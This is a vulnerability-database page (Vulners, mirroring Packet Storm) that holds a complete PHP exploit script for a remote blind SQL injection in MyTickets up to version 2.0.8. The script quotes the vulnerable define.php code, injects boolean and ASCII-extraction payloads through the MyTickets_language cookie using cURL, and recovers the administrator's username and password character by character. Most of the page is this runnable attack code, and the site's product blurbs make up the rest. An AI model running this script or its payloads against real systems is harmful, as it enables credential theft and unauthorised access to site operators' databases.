Lucene search
K

MyTickets Blind SQL Injection

🗓️ 18 Jun 2012 00:00:00Reported by al-swisreType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 14 Views

MyTickets Blind SQL Injection in General Define PHP Fil

Code
`<?php  
/*  
---------------------------------------------------------------  
MyTickets <= Remote Blind SQL Injection Exploit by al-swisre  
---------------------------------------------------------------  
  
author...............: al-swisre  
mail.................: oy3[at]hotmail[dot]com  
software link........: http://phpx3.com/scripts.html#mytickets  
affected versions....: from 1 to 2.0.8  
  
  
[-] Vulnerable code in include/system/general/define.php:  
  
43. if(empty($cookies['language'])){  
44. setcookie('MyTickets_language',$setting['default_language'],time()+86400,"/");  
45. $language = $setting['default_language'];  
46. }else{  
47. if($db->count('languages',"`id`='".$cookies['language']."'") == 0){  
48. $language = $setting['default_language'];  
49. }  
50. $language = $cookies['language'];  
52. }  
52.  
53. $language_array = $db->fetch($db->query("SELECT * FROM `languages` WHERE `id`='".$language."'"));  
  
  
*/  
  
  
print "\n+--------------------------------------------------------------------+";  
print "\n| MyTickets <= Remote Blind SQL Injection Exploit by al-swisre |";  
print "\n+--------------------------------------------------------------------+\n";  
  
  
if (!extension_loaded('curl')) die("cURL extension required\n");  
error_reporting(E_ERROR);  
set_time_limit(0);  
  
  
function get($url,$inj)  
{  
  
$curl = curl_init();  
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);  
curl_setopt($curl,CURLOPT_CONNECTTIMEOUT,3);  
curl_setopt($curl,CURLOPT_URL,$url);  
curl_setopt($curl, CURLOPT_COOKIE, "MyTickets_language=1$inj");  
curl_setopt($curl, CURLOPT_HEADER, 1);  
curl_setopt($curl, CURLOPT_VERBOSE, 0);  
$calis = curl_exec($curl);  
@curl_close($calis);  
return $calis;  
  
  
}  
  
function chek_get($connect)  
{  
  
if(eregi("include",$connect))  
{  
return false;  
}  
else  
{  
return true;  
}  
  
}  
  
  
if ($argc < 2)  
{  
print "\nUsage......: php $argv[0] <url>\n";  
print "\nExample....: php $argv[0] http://localhost/mytickets/";  
print "\nExample....: php $argv[0] http://localhost/mytickets/\n";  
die();  
}  
  
$sql_f = chek_get(get($argv[1],"' and 1='2 /*"));  
$sql_t = chek_get(get($argv[1],"' and 1='1 /*"));  
  
  
if($sql_t == $sql_f)  
{  
  
print "\n\t sorry: magic_quotes_gpc = On ): \n";  
die();  
}  
  
print "\n\t[+] Getting Admin Username and Password\n\n\t";  
  
  
  
for ($g = 1; $g <= 40; $g++) { //eidt  
for ($i = 46; $i <= 122; $i++) {  
  
$inject = chek_get(get($argv[1],"'+AnD+ascii(MiD((sElect+concat_ws(0x3a,username,password)+frOm+members+liMit 0,1),".$g.",1))='".$i."/*"));  
  
if($inject == true){print chr($i);}  
}  
}  
  
  
  
  
?>  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

18 Jun 2012 00:00Current
0.5Low risk
Vulners AI Score0.5
14